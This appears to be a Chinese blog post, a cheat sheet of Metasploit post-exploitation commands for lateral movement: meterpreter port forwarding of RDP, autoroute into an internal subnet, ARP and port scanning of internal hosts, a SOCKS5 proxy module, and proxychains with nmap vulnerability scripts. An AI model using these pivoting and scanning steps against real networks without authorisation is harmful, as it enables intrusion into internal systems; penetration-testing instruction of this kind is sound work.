当前位置:网站首页>MSF横向之MSF端口转发+路由表+SOCKS5+proxychains
MSF横向之MSF端口转发+路由表+SOCKS5+proxychains
2022-07-06 10:01:00 【西湖第一剑】
MSF后渗透的一些操作
端口转发
meterpreter > portfwd add -l 2222 -r 172.16.1.156 -p 3389 #将目标机172.16.1.156的3389端口转发到本地2222端口
meterpreter > portfwd list #查看转发列表
meterpreter > portfwd flush #清空转发列表
rdesktop 127.0.0.1:2222 #kali远程桌面使用2222端口
添加路由,横向渗透(跨网段攻击)
run autoroute -s 172.16.2.0/24 #添加到目标环境网络
run autoroute –p #查看添加的路由
route print #打印路由
run post/windows/gather/arp_scanner RHOSTS=172.16.2.0/24 #扫描整个段存活主机
run auxiliary/scanner/portscan/tcp RHOSTS=172.16.2.11 PORTS=3389 #检查IP是否开放3389
利用arp扫描内网主机
use post/windows/gather/arp_scanner
set rhosts 172.16.2.0/24
set session 1
exploit
Socks代理篇
新版的msf和老版的不一样,代理模块也不一样。
auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set srvport 7777
srvport => 7777
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.
[*] Starting the SOCKS proxy server
配置proxychains
用代理软件去连接建立好的socks隧道,便可以成功访问内网。
vi /etc/proxychains.conf #添加 socks5 127.0.0.1 7777
proxychains+nmap扫描主机是否存在漏洞
proxychains nmap -sT -Pn -p445 --script=vuln 192.168.52.141
proxychains使用msf框架
proxychains msfconsole
边栏推荐
- JMeter interface test response data garbled
- Automatic operation and maintenance sharp weapon ansible Foundation
- Debug and run the first xv6 program
- [introduction to MySQL] third, common data types in MySQL
- Chrome prompts the solution of "your company management" (the startup page is bound to the company's official website and cannot be modified)
- C语言指针*p++、*(p++)、*++p、*(++p)、(*p)++、++(*p)对比实例
- PySpark算子处理空间数据全解析(5): 如何在PySpark里面使用空间运算接口
- VR panoramic wedding helps couples record romantic and beautiful scenes
- Interview assault 63: how to remove duplication in MySQL?
- Concept and basic knowledge of network layering
猜你喜欢

Summary of Android interview questions of Dachang in 2022 (I) (including answers)

Unity particle special effects series - treasure chest of shining stars

面试突击63:MySQL 中如何去重?

Pytest learning ----- pytest confitest of interface automation test Py file details

kivy教程之在 Kivy 中支持中文以构建跨平台应用程序(教程含源码)

Sqoop I have everything you want
![[getting started with MySQL] fourth, explore operators in MySQL with Kiko](/img/11/66b4908ed8f253d599942f35bde96a.png)
[getting started with MySQL] fourth, explore operators in MySQL with Kiko

Concept and basic knowledge of network layering

Selected technical experts from China Mobile, ant, SF, and Xingsheng will show you the guarantee of architecture stability

C语言通过指针交换两个数
随机推荐
Distributed (consistency protocol) leader election (dotnext.net.cluster implements raft election)
Video fusion cloud platform easycvr adds multi-level grouping, which can flexibly manage access devices
F200——搭载基于模型设计的国产开源飞控系统无人机
kivy教程之在 Kivy 中支持中文以构建跨平台应用程序(教程含源码)
Today in history: the mother of Google was born; Two Turing Award pioneers born on the same day
Quick start of Hongmeng system
SAP UI5 框架的 manifest.json
Debug and run the first xv6 program
VR panoramic wedding helps couples record romantic and beautiful scenes
【MySQL入门】第四话 · 和kiko一起探索MySQL中的运算符
Automatic operation and maintenance sharp weapon ansible Playbook
Xin'an Second Edition; Chapter 11 learning notes on the principle and application of network physical isolation technology
Guidelines for preparing for the 2022 soft exam information security engineer exam
8位MCU跑RTOS有没有意义?
Pytest learning ----- pytest operation mode and pre post packaging of interface automation testing
VR全景婚礼,帮助新人记录浪漫且美好的场景
Manifest of SAP ui5 framework json
MarkDown语法——更好地写博客
RepPoints:可形变卷积的进阶
传统家装有落差,VR全景家装让你体验新房落成效果